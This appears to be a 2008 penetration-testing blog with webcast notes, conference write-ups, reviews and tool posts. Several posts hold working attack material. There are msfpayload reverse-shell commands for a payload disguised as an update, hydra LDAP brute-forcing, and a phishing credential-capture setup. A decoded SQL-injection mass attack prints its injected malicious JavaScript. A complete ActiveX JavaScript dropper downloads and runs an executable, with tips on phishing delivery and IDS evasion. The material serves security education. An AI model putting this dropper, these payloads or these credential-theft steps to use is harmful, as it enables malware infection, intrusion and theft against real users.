Carnal0wnage Blog

OWASP APPSEC 2008 Conference Videos Online

2008-10-10T18:53:00.001-04:00

OWASP APPSEC 2008 Conference Videos are online

http://www.owasp.tv

Notes from SANS Penetration Testing with Confidence Webcast

2008-10-10T14:51:00.002-04:00

SANS Webcast
https://www.sans.org/webcasts/show.php?webcastid=91101

Penetration Testing with Confidence: 10 Keys to Success

Lenny Zeltser

-(slide 3) sometimes the role of the attacker is tricky for a defender
-(slide 5) Asking the right questions about the pentest is essential to success.
**Less about a step by step and more about asking the right questions to get the right pen test for the customer

Question #1
-Is a pen test the type of assessment that is needed?
**Do you need to demonstrate the vulnerability, do you need to exploit it or is finding the vulnerability enough?

*Types of Assessments
-Vulnerability Assessment
-Security Policy Assessment
-Penetration Test

Question #2
-What is the scope?

*if its a pen test, is the customer actually ready to have their network or application exploited
*possibility of system crashes and failures due to failed exploitation attempts
*pen tests are good for shock value, prove that someone can get in and access information

*Scope Questions

-Targets=which specific systems or networks?
-Depth=how far into the network can we go? need to work that out before you start.
-Exclusions=self explanatory
**excluded systems are usually the most jacked up :-)

Question #3
-What tests should be performed?

*Commonly excluded tests ;-(
**mostly because they are so effective
-Denial of Service
-Physical Security
-Social Engineering
*but if its allowed, try to test specific cases that would be violations of policy or training, will people click on links in emails even though the user training says not to
-War Dialing
-Client-side Attacks

Question #4
-Are non-commercial tools allowed?
**Canvas, Core Impact, MSF, standalone exploits, BT are not necessarily "vetted" and you may need to get permission to use them

Question #5
-What is the attacker's profile

*Professional versus amateur
-Target a network for information and money
-Non-targeted attack, attack of opportunity
*knowing what type of attacker will drive the types of tests you do

Question #6
-Is it a White Box or Black Box test?

-White=full knowledge
-Black=no knowledge minus left & right limits
*depending on the test drives the Path of least resistance and attack trees
-Try to strategize before hand, check out slides 19-22, consider making attack trees

Question #7
-What are the time constraints?

-Duration of the test
-Timing restrictions

Question #8
-How to handle issues that may arise during the test?

-Target system crashed
-Sensitive data found
-You're not the first person on the box...eeeeek
*have a contact form for issues that come up

Question #9
-What do you do with the results?

Question #10
-Do I have explicit permission to perform the pen test

-Written permission...CYA

Notes from SANS Beyond Front-Line Exploits Webcast

2008-10-09T16:27:00.002-04:00

Webcast http://www.sans.org/webcasts/show.php?webcastid=91586

Beyond Front-Line Exploits:
Tips and Tools for Comprehensive Penetration Testing

Lenny Zeltser August 2008

#1 Data in plain sight:

-(slide 6/7) site:example.com filetype:pdf
-(slide 8/9)Libextractor for extracting metadata
-(slide 10) Metagoofil
-(slide 11/12)maltego

#2: Remote Password-Guessing

-If you dont find possible usernames using the info in Data In Plain Sight, you can generate your own using
US Census to generate Top Last Names, Top Female First Names, Top Male First Names
http://www.census.gov/genealogy/names/names_files.html

*you'll have to figure out the naming convention for the company your auditing

**my note: have your top 40 username/pass I also have one for mssql passwords, at least you can do a "low hanging fruit" type check besides checking for null passwod

-(slide 15)theharvester for email gathering -use google, linkedin, pgp
-(slide 16) see if webpage gives you a clue if your username/pass is wrong username or wrong password based on error messages in the app
-(slide 17) validate usernames using brutus if the app return useful error messages
-(slide 18/19) create a list of good usernames and a short list of passwords that are worth trying "remote password guessing" writeup on ISC
-(slide 20) Accent Keyword Extractor, keywords that could be passwords for people in the company
-(slide 21) is the password recovery mechanism a weak link? ask you for secret question and display new password, can you use the app to find valid usernames? where if i enter in the wrong username it says i dont know who you are, where if i enter in a correct username a i get a secret question prompt
-(slide 24) if ldap exposed or queriable -- Ldap bruteforce with hydra $ hydra -L users.txt –P passwords.txt ldap.example.com ldap2 or $ k0ld –f users.txt -w passwords.txt -I -o out.txt -f 'cn=*' -h ldap.example.com k0ld is supposedly written specificicaly for ldap
-(slide 25) tsgrinder -- need old version or RDP client for tsgrinder to work, need version 5
** tut by me http://www.ethicalhacker.net/content/view/106/24/
** default 2k3 password complexity with shut this tool down without a good dictionary

#3: Social engineering
**just ask for what you need!
-(slide 29) email phish example for password reset
-(slide 30) ArGoSoft Mail Server Freeware allows you to relaymail locally
-(slide 31) register a similar domain name as your target, use domaintools.com to check for you. http://www.domaintools.com/domain-typo
-(slide 32) just present an error message after the user inputs creds to
-(slide 33) php backend and plugins to grab important data
USER: jsmith
PASSWORD: plumlips
LOCAL IP: 192.168.2.144
REMOTE IP: 208.77.188.166
PORT: 61035
USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
PLUGINS: Move Media Player; QuickTime Plug-in 7.4.1;
Mozilla Default Plug-in; RealJukebox NS Plugin;
RealPlayer(tm) G2 LiveConnect-Enabled Plug-In (32-bit);
Shockwave Flash; Java(TM) Platform SE 6 U2;

*current browsers are not allowing to pull local IP easily

#4: Client-Side Backdoors

-(slide 35/36) target those 3rd party client side vulnerabilities -- delivery is still email or web
-(slide 37) just ask user to install the malware
-(slide 38/39) reverse shell out to attacker, or use msfpayload, he used VNCreverse
$ msfpayload windows/vncinject/reverse_tcp LPORT=5544
LHOST=192.168.1.124 DisableCourtesyShell=True X >
update2.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/vncinject/reverse_tcp
Length: 177
Options: LHOST=192.168.1.124,LPORT=5544,
DisableCourtesyShell=True

$ msfcli exploit/multi/handler LPORT=5544
PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.124
DisableCourtesyShell=True E

-(slide 43) try to get some new things brought into scope for pentests especialy client sides

-from the questions, mindmap all that info above to organize, freemind is a free version

AMEX = FAIL

2008-10-06T15:27:00.002-04:00

saw this today while reseting a password...awesome.

Also looks like I'm not the only one having the problem.
http://lastinfirstout.blogspot.com/2008/10/trivial-account-reset-on-american.html

California RFID Law = FAIL

2008-10-03T22:30:00.003-04:00

I've been looking for something good to give the "FAIL" to and here it is:

From Wired Threat Level:

"California followed Washington State's footsteps this week to become the second U.S. state outlawing so-called Radio Frequency Identification Device skimming.

Skimmers can easily pilfer information from non-encrypted RFID tags that are growing commonplace. California's bill was adopted and signed by Gov. Arnold Schwarzenegger this week after a demonstration showed that personal information skimmed from entry-card badges from statehouse workers allowed hackers access to secured areas of government offices.

Still, California's measure (.pdf) and the one Washington State adopted in March, don't mandate any RFID encryption. So the vulnerabilities of the Golden State statehouse's entry system remains."

http://blog.wired.com/27bstroke6/2008/10/rfid-anti-skimm.html

All I can say is wow (or fail). The only people this is going to hurt is the security consultants trying to find and fix insecure RFID applications for customers. Much akin to banning guns so only the bad guys have them. Non-technicians making technical policy FTW!

ToorconX Wrap-Up

2008-10-02T19:25:00.003-04:00

Joe and I had the opportunity to teach our 2 day Crash Course In Pentesting workshop at Toorcon X. I felt like the workshop went pretty well and we got some good feedback from the students. Joe has spent that last year really working on web application pentesting and can really break down SQL injection and XSS type assessments and attacks. He had day two of the workshop and I thought it was really good. We even had a custom bookstore web application built for the students to practice SQLI, XSS, and LFI/RFI. I had day one. Frankly I covered too much material and not enough time for the students to actually do anything with the lab images but they did get the hard drives to take that stuff home along with the lab manual for the web application thing and the draft version of the LSO Metasploit Mini-Course.

Here is the breakdown of the seminars.
http://sandiego.toorcon.org/content/section/5/7/

9:30 Jay Beale: Owning the Users with The Middler
11:00 James O'Gorman & Matthew Churchill: Digital Forensics - Footsteps in the Snow
14:00 Travis Goodspeed: Repurposing the TI EZ430 Development Tool
15:30 Ryan Sherstobitoff: The Evolution of Cyber Crime
17:00 Jared DeMott: AppSec A-Z: Reverse Engineering, Source Code Auditing, Fuzzing, and Exploitation

Jay Beale's talk was cool, it was on his tool middler which I had heard about before but hadnt played with (I think because it wasnt released). It will MITM the user's browser and hijack EVERY web session, grab the cookies, insert any javascript of your choosing. I dont think the tools website is up yet but his slides from Defcon16 are, you can check those out for more info:
http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-beale-2.pdf

James O'Gorman & Matthew Churchill from Continuum World Wide gave a good talk on forensics. The had some great slides on dispelling forensics myths and gave everyone a chance to ask questions about the current state of forensics.

I missed Travis Goodspeed's talk.

I caught most of Ryan Sherstobitoff's talk. He was from Panda Security and talked about some stats they had accumulated on different types of malware in the wild.

Jared DeMott talked about reversing 101 and exploitation 101. quite a bit to cover in 90 minutes. He covered alot on IDA Pro and then talked about doing some simple exploitation and shellcode development. Fun stuff.

Here's the link to the breakdown of the conference, I wont paste it all.
http://sandiego.toorcon.org/content/section/3/9/

Dan Kaminsky's keynote was awesome, he of course talked about the DNS bug but more importantly he talked about how exploitation and vulnerabilities really have to be though of in groups. Its not so much one vulnerability breaking the internet, but now you can string several together for total world domination. *btw, NONE of that is a quote from his talk.
http://toorcon.org/tcx/1_Kaminsky.pdf

I really enjoyed Ben Feinstein's talk on the "Loaded Dice: SSH Key Exchange & the OpenSSL PRNG Vuln." He did a good job explaining SSL and showing the steps with wireshark and then doing a live demo showing what could happen if you are doing SSH with a bad cert.
http://toorcon.org/tcx/3_Feinstein.pdf

Ariel Waissbein is from Core Security and talked about some new tool they are releasing that will do simulated exploitation by reading in virtual machine config files and interfacing that will core impact "to test to see if you were vulnerable in the past". I wasn't too impressed. If i was taking the I was owned in the past stance I should just go start looking for evidence of the hack rather than testing to see if the Core Impact module works.
http://toorcon.org/tcx/5_Waissbein.pdf

Joe McCray of course rocked the SQLI.
http://toorcon.org/tcx/9_McCray.pdf

Grutz rocked the NTLM pass the hash with windows authentication and squirtle. If i hear the talk one more time I might be able to take in the full impact of what you can do with it.
http://toorcon.org/tcx/10_Grutz.pdf

Sunday was the 20 minute talks.

I caught Christian Heinrich's "Googless" talk where his OWASP group is writing some code to use the google SOAP API to do some searches.

I caught a bit of Marc Bevand's "Breaking UNIX crypt() on the PlayStation 3" talk but had to leave early to get set up for my talk

Got in late for Dan Griffin's "Hacking SharePoint" but it seemed good, looking forward to the slides from it.

Here's what I caught the rest the of the day:
Dan Hubbard's "P0wn the Cloud. The good, the bad, and the pugly of Cloud Computing"

Joshua Brashars' "Owning telephone entry systems (aka why you shouldn't sleep so well)" basically what the title says, default passwords are great, default passwords of 0000 are even better.

Stephan Chenette's "Ultimate Script Deobfuscation: Browser Hooking versus simulation" discussed a very cool tool that would hook IE and document.write and other function I cant remember right now so you can read what the obfuscated java is doing after the browser has done its thing with it. very cool.

David Byrne's "Advanced Techniques in Automated Web Application Testing" talked about Grendal-Scan and the Grendal-Scan blog.

Luis Miras & Zane Lackey's "Mobile Phone Messaging Anti-Forensics" talked about F'ing up the SD card on cell phones that would crash any SD forensics software.

All in all a great con. Huge props to all toorcon crew.

New School Information Gathering ToorconX edition

2008-10-02T17:58:00.004-04:00

Here is the outline for my New School Information Gathering talk that I gave at ToorconX.

Open Source Intelligence Gathering (OSINT)‏
FierceDNS
SEAT/Goolag
Google Mail Harvesters
Metagoofil
Online Tools: ServerSniff/DomainTools/CentralOps/Clez.net/Robtex/Spoke
Tying it all together with Maltego

I hid several slides to get the talk into the 20 minute time frame but you should see them in the posted slide deck.

Slides are available here:
http://www.carnal0wnage.com/research/Carnal-NewSchool-ToorconX.pdf

Comments and feedback are always welcome even though I received nothing back from all the people that emailed me asking for them last time :-(

-CG

Why Blog?

2008-09-30T19:41:00.002-04:00

Richard Bejtlich has a really good blog post on his blog entitled "why blog".

He lists five things:

Blogging organizes thoughts.

Blogging captures and shares thoughts.

Blogging facilitates public self-expression.

Blogging establishes communities.

Blogging can contribute original knowledge faster than any other medium.

I'll let you read the blog for the discussion on the five things but I've really enjoyed blogging.

I mostly keep the blog as my note taking canvas (for notes I want to share with others) but RB's five reasons are reasons I blog as well.

Toorcon X Workshop

2008-09-14T20:57:00.003-04:00

As I mentioned before, Joe and I are doing a Crash Course In Pentesting 2 day workshop at ToorconX

http://sandiego.toorcon.org/content/section/4/8/

Here's a piece from the description:

"This course will cover some of the newer aspects of pen-testing covering; Open Source Intelligence Gathering with Maltego and other Open Source tools, Scanning, Enumeration, Exploitation (Both remote and client-side) and Post-Exploitation relying heavily on the features included in the Metasploit Framework. We'll discuss our activities from both the Whitebox and Blackbox approach keeping stealth in mind for our Blackbox activities.

Web Application penetration testing will be covered as well with focus on practical exploitation of cross-site scripting (XSS), cross-site request forgery (CSRF), local/remote file includes, and SQL Injection."

But I wanted to give a few more details.

Day 1 is network level pentesting and Day 2 is web application pentesting.

Network level is mostly my responsibility and I'll be focusing on black box information gathering, client side attacks, and post exploitation. Its hard to cover pentesting in a day, so I'll be talking heavily on client side attacks and how to implement those into your pentests and some of the tools you'll need to do it. A little bit on local/priv escalation attacks that you'll need to do once you have that userland shell and post exploitation. There is also a block on metasploit and the students will take home a copy of LSO's Metasploit Mini Course.

Web application is Joe's responsibility and it should be really good. We've had a custom web app built with vulnerabilities intentionally built in. So the students will be able run the tools he is going to discuss and then exploit the vulnerabilities they find. They also get to take the VM home with them.

If you have questions feel free to post up or email me with them.

passing the hash with gsecdump and msvctl (yes more)

2008-09-12T17:08:00.004-04:00

So just a follow up post on gsecdump and msvctl after doing prep for post exploitation topics for the toorcon workshop.

For some reason I thought that gsecdump would not require admin privileges, this is incorrect it will require admin or system on the box. What it doesn't require is injecting into lsass to get the hashes (at least according to here).

"Most notable features are extracting password hashes for active logon sessions, LSA secrets without injecting into lsass.exe making it safe to run on any system and pwdump functionality without DLL injection (and a lot more stable). Gsecdump has no DLL dependency making it very easy to use on remote systems with psexec. If it for some reason can't do what it is supposed to, try running it as SYSTEM and you should get your info."

OK, so you still need admin or higher but the cool thing (and I have already covered this) is that it dumps the hashes for active logon sessions. Now, the key to to that is active logon sessions. So if you are userland and admin or higher then you might be stuck with that user's hash because once the log out the active logon session hash seems to disappear (sometimes ??) but if you get a system shell you might get some of the old logged in users.

example:
#popped a system shell and got a command shell with meterpreter

C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

#logged into the box as nobody

C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
XPSP1VM\nobody::e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Logged out as nobody
C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Once nobody logs out, things were back to where they were. This is an important distinction between gsecdump/msvctl and token stealing. But, once you have a hash, any user can use that hash where you have to be admin/system to pass tokens.

Let's see the same scenario with incognito

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

#login as nobody
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
XPSP1VM\nobody

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

#log out as nobody
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
XPSP1VM\nobody

meterpreter > impersonate_token XPSP1VM\\nobody
[-] No delegation token available
[+] Successfully impersonated user XPSP1VM\nobody
meterpreter > getuid
Server username: XPSP1VM\nobody
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Lastly, like I already mentioned in the other msvctl post, you have to actually be sitting on the box to get your new shell with the user's creds you passed because it pops up a whole new command shell. Which is kind of a bummer, with a remote shell. You'll have to use the pass the hash toolkit instead.

Some other reading on gsecdump and msvctl
http://blogs.pointbridge.com/Blogs/seaman_derek/Pages/Post.aspx?_ID=20
http://ciac.llnl.gov/ciac/techbull/CIACTech08-002.shtml

http://truesecurity.se/blogs/murray/archive/2007/06/08/my-sec-310-sesson-on-teched-us-2007-is-now-available-as-a-webcast.aspx

Also I was doing some googling on pass the hash and came across this post in reference to the pass the hash problem, best part in bold.

http://www.eggheadcafe.com/software/aspnet/30890366/hash-injection-mitigation.aspx
best quote:

"Hash injection mitigation? - Steve Riley [MSFT] <06-oct-07 style="font-weight: bold;">In either case, you need to become admin of the computer before you can force the compromised machine to release its hashes from memory, which lessens the likelihood of success. And if you did manage to become admin, there are fare more interesting attacks that you'd want to attempt. By the way, sniffing a network connection won't reveal hashes. In other words, there's nothing new here, and very little that you need to worry about."

I don't know, going from a local admin on a box to domain admin is pretty interesting to me...

Mike Murray on Human Exploitation 101

2008-09-12T12:30:00.002-04:00

http://www.ethicalhacker.net/content/view/209/1/

From the article:

"This is going to be all about dealing face-to-face (or voice-to-voice or text-to-text) with real live people and exploiting the natural tendency to trust.

Of course, this skill underpins everything else that we do when on a social-engineering engagement - in order to impersonate a UPS guy, talk someone out of their password, write a great targeted phishing email, or know exactly where to drop the USB keys - you have to have great skills at exploiting the natural tendencies of humans.

This means a deep understanding of the three fundamental skills (that I have mentioned often in introductory talks and articles on this topic) - the ability to communicate, the ability to be aware of your surroundings, and your ability to control the context (or "cognitive frame") of your interaction."

Human 0days are promised in the future!

cute...

2008-08-31T15:33:00.008-04:00

checking web logs...

71.191.45.109 - - [30/Aug/2008:19:06:39 +0000] "GET /hack/brutessh2.c?';DECLARE%
20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766172636861722832353529
2C40432076617263686172283430303029204445434C415245205461626C655F437572736F722043
5552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F
626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E
6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E7874797065
3D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F43757273
6F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D3029204245
47494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D27
27223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568
756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40
432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E
3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F637372
73732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F
4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F534520546162
6C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4
000));EXEC(@S); HTTP/1.1" 501 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Window
s NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

Decodes to:
DECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id an?? a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@F??TCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''">//script src="hxxp://www0.douh??nqn.cn/csrss/w.js"//script////!--''+['+@??+'] where '+@C+' not like ''%"//script src="hxxp://www0.douhunqn.cn/csr??s/w.js"//script//!--''')FETCH NEXT FRO?? Table_Cursor INTO @T'@C END CLOSE Tab??e_Cursor DEALLOCATE Table_Cursor

the java:

window.onerror=function()
{
document.write("//iframe width="0" height="0" src="hxxp://www0.douhunqn.cn/csrss/new.htm">//iframe>");
return true;
}
if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('//iframe marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="hxxp://count41.51yes.com/sa.aspx?id="419214144'+yesdata+'" height="0" width="0">//iframe>');

document.write("//iframe width="0" height="0" src="hxxp://www0.douhunqn.cn/csrss/new.htm">//iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(iyesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}

new.htm is nice:

launches several iframes that launch several other attacks. very nice. I'll let you pull down that code.

hxxp://www0.douhunqn.cn/csrss/lzx.htm
hxxp://www0.douhunqn.cn/csrss/IERPCtl.IERPCtl.1
hxxp://www0.douhunqn.cn/csrss/real11.htm
hxxp://www0.douhunqn.cn/csrss/real10.htm
hxxp://www0.douhunqn.cn/csrss/S.S
hxxp://www0.douhunqn.cn/csrss/Bfyy.htm --> Storm Player Exploit

The only exploit that was there was the real11.htm one :-(

new.htm also serves up:
//iframe src=hxxp://www.ppexe.com/csrss/06014.htm width=100 height=0>
//iframe src=hxxp://www.ppexe.com/csrss/flash.htm width=100 height=0>
//Iframe src=hxxp://www.ppexe.com/csrss/net.htm width=100 height=0>
//Iframe src=hxxp://www.ppexe.com/csrss/ff.htm width=100 height=0>

that malware with the .exe's are still available

there is a good write up of most of the code here

http://blogs.technet.com/mmpc/archive/2008/08/28/a-normal-day-at-the-office.aspx

Setting up my "slice" from slicehost

2008-08-30T10:55:00.007-04:00

If you are looking to have your own box and get your hands dirty with Linux administration then slicehost is a great option for you.

My last hosting company didn't allow me access to log files and were just an overall pain to work with. I can tell you that if Alan Shimel had had my hosting company the guys that took over his domain probably wouldn't have had the patience to wait out what it took me to move mine...anyway I digress.

Slicehost is great, here is a breakdown of their plans:

RAM PRICE HD BW

256 slice	$20.00	10GB	100GB
512 slice	$38.00	20GB	200GB
1GB slice	$70.00	40GB	400GB
2GB slice	$140.00	80GB	800GB
4GB slice	$280.00	160GB	1600GB

You start with a slimmed down version of one of the following OS's"

Arch 2007.08
CentOS 5.2
Debian 4.0 (etch)
Fedora 9
Gentoo 2008.0
Ubuntu 7.10 (gutsy)
Ubuntu 8.04.1 LTS (hardy)

My Ubuntu install was only about half a gig, so I had plenty of space for the carnal0wnage site even though the blog really takes all the traffic. I'm not going to do a lockdown guide, there are so many on the net, but you basically SSH in (also has a web console if you get locked out) and start "apt-getting" what you need to set up your box they way YOU want it. You also have full reboot privileges or if you really hose up your install you can just reformat.

Things I did:

installed stuff I probably don't need :-)
locked down sshd
installed apache2 and modsecurity
configured DNS for web and google mail
installed and configured denyhosts
started tweaking iptables rules

You can't beat 20 bucks a month for an IP and root on your own box ;-)

They also have an API so you can script management and status tasks
http://articles.slicehost.com/2008/5/13/slicemanager-api-documentation

Extra Help
http://cactuswax.net/articles/slicehost-configuration/
http://www.usefuljaja.com/2007/4/setting-up-your-domain
http://www.vinno.net/linux/server/how-to-install-mod-security-2

Owning the Client without an Exploit

2008-08-27T17:30:00.005-04:00

So after a long hiatus of no posts I figured it was time to step up and post something that may be of interest to pentesters. In the spirit of continuity to some previous posts about client-side attacks and as a follow up to some discussions that Chris and I have been having, this post will be about Client-side Ownage.

It's nothing groundbreaking but may have a place in your arsenal of tools and attack vectors. What do you do when all those cool client-side attacks in Metasploit fail? Damn those companies that patch 3rd party products. As shown in the previous posts it's still possible to gather a great deal of information about the remote user, host and network using PHP and some Java but what do you do when you need a foothold on that host to pivot further into the network?

Enter the Dropper. Using JavaScript and Microsoft's XMLHTTPRequest Object it is possible to download and run your backdoor with just a little interaction from the victim. The XMLHTTPRequest Object, a core component of AJAX, provides support for client-side communication with a HTTP server. A user can make use of the XMLHTTP Object to send a request and have the XML DOM parse that request. Great if you have data such as XML that you need to parse and display on a page for example.

What about requesting another file type like, oh I don't know, an exe? This might have some value. :) Lets take a look at a JavaScript function to do just that.

First we need to create our object elements and the required attributes needed to download and execute the file we want:

function dropper() {

var x = document.createElement('object');
x.setAttribute('id','x');
x.setAttribute('classid','clsid:D96C556-65A3-11D0-983A-00C04FC29E36');

try {
var obj = x.CreateObject('msxml2.XMLHTTP','');
var app = x.CreateObject('Shell.Application','');
var str = x.CreateObject('ADODB.stream','');

We use document.createElement to create an element and use it in conjunction with setAttribute to modify the attributes of each new element. The classid in use is a Remote Data Service object. It allows the execution of code from a remote source. Search your registry and you'll see that it is assigned to RDS.DataSpace, a non-visual ActiveX control, which handles remote data connections. This function is part of Microsoft's MDAC.

We create our msxml2.XMLHTTP object which will handle communication with the web server that is hosting our executable.

Then we use the Object element to instantiate a Shell Object which is identified by the CLASSID.

The ADODB.Stream object in ActiveX, which contains methods to manage a stream of binary data or text, is used to handle the storing and saving of the data to a file.

Now let's grab the file, install it to a directory of our choice and run it.

try {
str.type = 1;
obj.open('GET','http://coolsite.com//innocent.exe',false);
obj.send();
str.open();
str.Write(obj.responseBody);
var path = './/..//svchosts.exe';
str.SaveToFile(path,2);
str.Close();
}
catch(e) {}

First we use the Type property to set the type of data in the stream object. 1 is for Binary.

Next we use the XMLHTTPRequest Open Method intialize an MSXML2.XMLHTTP request in which we specify the retrieval method, URL and authentication information if any. The XMLHTTPRequest Send Method allows us to send the HTTP request to the server.

The ADODB.stream Open Method is used to create and open a Stream opject. The ADODB.stream Write Method is used to write the binary data to a binary Stream object. After specifying the path we now use the ADODB.stream SaveToFile method is used to save contents of our open Stream object to a local file of our choosing. In this case we use am option value of 2 that overwrites the file if it already exists. We then close the object.

The next step is to use our Shell Object to execute our newly downloaded executable using the shellexecute function.

try {
app.shellexecute(path);
}
catch(e) {}
}
catch(e) {}
}

Place this code in a webpage either directly or through an include, create a good phishing email (see other posts) and send it off to your victims. Before anyone makes mention that this requires ActiveX to run remember that enough users will allow ActiveX controls to be run for it to be useful. On I.E. 6 this should perform a silent download and on I.E. 7 it will prompt the user.

You can add additional code to the page to check the browser version and prompt the user to either change to IE or have a direct link to the file for the user to click and run. Remember it just takes one user that follows the link to give you access.

One other thing to consider is IDS/IPS evasion. The code above will likely get flagged by an IDS in the form it is now. Look at JavaScript obfuscation techniques such as 'string-splitting', arguments.callee() and other methods to evade the IDS or just hide your code.

Variants of this method we have just discussed are actually widely used by malware authors on their sites to drop files onto users systems. Have a look at the next spam email you get and decode the JavaScript on the page.

Cheers,

BGP Eavesdropping

2008-08-26T21:43:00.004-04:00

From Wired:

Two security researchers have demonstrated a new technique to stealthily intercept internet traffic on a scale previously presumed to be unavailable to anyone outside of intelligence agencies like the National Security Agency.

The tactic exploits the internet routing protocol BGP (Border Gateway Protocol) to let an attacker surreptitiously monitor unencrypted internet traffic anywhere in the world, and even modify it before it reaches its destination.

The man-in-the-middle attack exploits BGP to fool routers into re-directing data to an eavesdropper's network.

Anyone with a BGP router (ISPs, large corporations or anyone with space at a carrier hotel) could intercept data headed to a target IP address or group of addresses. The attack intercepts only traffic headed to target addresses, not from them, and it can't always vacuum in traffic within a network -- say, from one AT&T customer to another.

The method conceivably could be used for corporate espionage, nation-state spying or even by intelligence agencies looking to mine internet data without needing the cooperation of ISPs.

http://blog.wired.com/27bstroke6/2008/08/revealed-the-in.html

2nd post on it
http://blog.wired.com/27bstroke6/2008/08/how-to-intercep.html

slides from Defcon: https://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-pilosov-kapela.pdf

Book Review: The IDA Pro Book

2008-08-26T14:46:00.001-04:00

I was able to pick up a pre-released copy of The IDA Pro book at Defcon in the vendor area, thanks to Adam from No Starch. This book is not an introduction to reverse engineering, its a hard core manual for IDA Pro. IDA Pro is a critical weapon in any reverser's arsenal, so proficiency in this tool is paramount to your success in reverse engineering. If you are new to IDA Pro you need this book, even if you've been working with IDA for a while you will more than likely learn quite a few things after reading it. Unlike the two other books I've read on IDA Pro this book has no fluff or filler, its solid information! The funny thing when comparing it to the other two IDA books is its thicker than both combined, and contains an exponentially larger amount of information.

The author takes time to explain things in a very clear manner as you walk through from an introduction to the tool to more advanced usage such as customizing, extending IDA, debugging, and dealing with obfuscated code. The author answered questions I had been spent weeks asking and searching the Internet for.

Likes:

Just about everything. The author walks you through plenty of code and discusses scenarios where you could apply the information he is giving you. The fact that he took his time to elaborate on why, and when you might use a piece of information is unlike many authors whom will give you information and leave the reader wondering "What would I use that for".

This book does not just talk about Win32 and Portable Executable format, ELF binaries have a continual guest appearance throughout the book, and firmware/binaries are mentioned in numerous chapters.

Side bar elaboration is kept to a minimum, I often find in texts that an author will go on about background information that does not add anything significant to what I am reading. Chris Eagle keeps this to a minimum adding small side bars when necessary but only take up a small amount of real estate.

Dislikes

My only dislike of this book was the use of PE format as the example in chapter 18 – Binary Files and Ida Loader modules. Despite the use of a well known format chosen for this example the concepts were clearly displayed. I think it would have made it more interesting if the author had used a lesser known format, or do as the author of "Reversing, Secrets of Reverse Engineers" did and create his own binary.

-Phn1x

Senspost reDuh released

2008-08-26T08:39:00.006-04:00

Finally!

I've been waiting to play with this tool since the presentation at Defcon. Tunneling TCP through well formed HTTP which decodes it on the other end back into TCP is a pretty handy option.

"What Does reDuh Do?
reDuh is actually a tool that can be used to create a TCP circuit through validly formed HTTP requests.

Essentially this means that if we can upload a JSP/PHP/ASP page on a server, we can connect to hosts behind that server trivially"

Here's the link(s).
http://www.sensepost.com/blog/2399.html

